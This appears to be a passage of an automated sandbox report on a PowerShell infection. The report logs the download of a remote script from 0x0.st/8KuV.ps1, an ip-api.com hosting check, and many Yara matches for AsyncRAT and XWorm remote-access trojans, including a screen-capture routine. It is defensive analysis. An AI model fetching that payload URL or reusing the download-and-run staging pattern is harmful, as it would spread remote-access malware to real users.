                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: 0x0.st
                Source: global trafficDNS traffic detected: DNS query: ip-api.com
                Source: global trafficDNS traffic detected: DNS query: api.msn.com
                Source: powershell.exe, 00000005.00000002.2325412269.000001D313C04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CD0F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1AA55A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC07437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.0000020600C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0x0.st
                Source: svchost.exe, 0000001F.00000003.2316380909.0000028695218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: svchost.exe, 0000001F.00000003.2316380909.0000028695218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                Source: qmgr.db.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: svchost.exe, 0000001F.00000003.2316380909.0000028695218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: svchost.exe, 0000001F.00000003.2316380909.0000028695218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: svchost.exe, 0000001F.00000003.2316380909.000002869524D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: qmgr.db.31.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: powershell.exe, 00000005.00000002.2325412269.000001D3133DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2325412269.000001D312D1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2325412269.000001D3133D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                Source: powershell.exe, 00000005.00000002.2325412269.000001D312D1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2325412269.000001D3133C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                Source: powershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000005.00000002.2325412269.000001D3126D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000005.00000002.2325412269.000001D3124B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CC4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1A9956000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC06836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.0000020600006000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.2325412269.000001D3126D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000005.00000002.2325412269.000001D313B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CCDF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CC71D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1AA4A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1A9B7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC0715A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC06A5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.000002060022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.0000020600903000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0x0.st
                Source: powershell.exe, 0000001C.00000002.2323673539.0000020600903000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0x0.st/8KuV.ps1
                Source: powershell.exe, 00000005.00000002.2325412269.000001D3124B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CC4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1A9956000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC06836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.0000020600006000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: svchost.exe, 0000001F.00000003.2316380909.00000286952C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                Source: svchost.exe, 0000001F.00000003.2316380909.00000286952FF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.2316380909.000002869520E000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                Source: svchost.exe, 0000001F.00000003.2316380909.00000286952C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                Source: svchost.exe, 0000001F.00000003.2316380909.00000286952A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.2316380909.0000028695307000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.2316380909.00000286952C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.2316380909.00000286952E8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                Source: svchost.exe, 0000001F.00000003.2316380909.00000286952C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                Source: powershell.exe, 00000005.00000002.2325412269.000001D3126D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000005.00000002.2325412269.000001D3133E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: svchost.exe, 0000001F.00000003.2316380909.00000286952C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                Source: svchost.exe, 0000001F.00000003.2316380909.0000028695272000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50042 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50044 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50043 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50045 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50047 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Yara detected AsyncRAT
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133b65d0.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa26a4b0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc0714a0b0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601de4450.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008ed970.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07141480.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa248728.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07127e40.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008f65a0.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601dfa830.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601dfa830.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2d5060.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccde7168.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601de4450.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7e4bb0000.16.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2eb440.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa261880.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008f65a0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccdde538.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008ed970.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa248728.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133ad9a0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2eb440.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7e4bb0000.16.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133975c0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07127e40.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.00000206008C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2325412269.000001D313377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CE2B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CE2E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2248750195.000002CC070F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CCDB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2720, type: MEMORYSTR
                Contains functionality to capture screen (.Net source)
                Source: 5.2.powershell.exe.1d32a870000.9.raw.unpack, RemoteDesktop.cs.Net Code: GetScreen

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 5.2.powershell.exe.1d3133b65d0.8.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 5.2.powershell.exe.1d3133b65d0.8.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 18.2.powershell.exe.1e1aa26a4b0.1.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 18.2.powershell.exe.1e1aa26a4b0.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 23.2.powershell.exe.2cc0714a0b0.4.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 23.2.powershell.exe.2cc0714a0b0.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 18.2.powershell.exe.1e1aa26a4b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 18.2.powershell.exe.1e1aa26a4b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 28.2.powershell.exe.20601de4450.13.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 28.2.powershell.exe.20601de4450.13.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 28.2.powershell.exe.206008ed970.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 28.2.powershell.exe.206008ed970.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 23.2.powershell.exe.2cc07141480.1.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 23.2.powershell.exe.2cc07141480.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 18.2.powershell.exe.1e1aa248728.8.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 18.2.powershell.exe.1e1aa248728.8.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 23.2.powershell.exe.2cc07127e40.3.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 23.2.powershell.exe.2cc07127e40.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 28.2.powershell.exe.206008f65a0.7.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 28.2.powershell.exe.206008f65a0.7.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 28.2.powershell.exe.20601dfa830.9.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 28.2.powershell.exe.20601dfa830.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 23.2.powershell.exe.2cc0714a0b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 28.2.powershell.exe.20601dfa830.9.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 28.2.powershell.exe.20601dfa830.9.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 23.2.powershell.exe.2cc0714a0b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 11.2.powershell.exe.1d7ce2d5060.3.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7ce2d5060.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 11.2.powershell.exe.1d7ccde7168.12.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7ccde7168.12.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 28.2.powershell.exe.20601de4450.13.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 28.2.powershell.exe.20601de4450.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 11.2.powershell.exe.1d7e4bb0000.16.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7e4bb0000.16.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 11.2.powershell.exe.1d7ce2eb440.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7ce2eb440.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 18.2.powershell.exe.1e1aa261880.9.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 18.2.powershell.exe.1e1aa261880.9.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 28.2.powershell.exe.206008f65a0.7.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 28.2.powershell.exe.206008f65a0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 18.2.powershell.exe.1e1aa261880.9.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 18.2.powershell.exe.1e1aa261880.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 11.2.powershell.exe.1d7ccdde538.9.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7ccdde538.9.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 28.2.powershell.exe.206008ed970.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 28.2.powershell.exe.206008ed970.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 18.2.powershell.exe.1e1aa248728.8.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 18.2.powershell.exe.1e1aa248728.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 5.2.powershell.exe.1d3133ad9a0.3.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 5.2.powershell.exe.1d3133ad9a0.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 11.2.powershell.exe.1d7ce2eb440.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7ce2eb440.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 11.2.powershell.exe.1d7e4bb0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7e4bb0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 5.2.powershell.exe.1d3133975c0.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 5.2.powershell.exe.1d3133975c0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 23.2.powershell.exe.2cc07141480.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 23.2.powershell.exe.2cc07141480.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 23.2.powershell.exe.2cc07127e40.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 23.2.powershell.exe.2cc07127e40.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000001C.00000002.2323673539.00000206008C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000001C.00000002.2323673539.0000020601DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000001C.00000002.2323673539.0000020601DC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000005.00000002.2325412269.000001D313377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
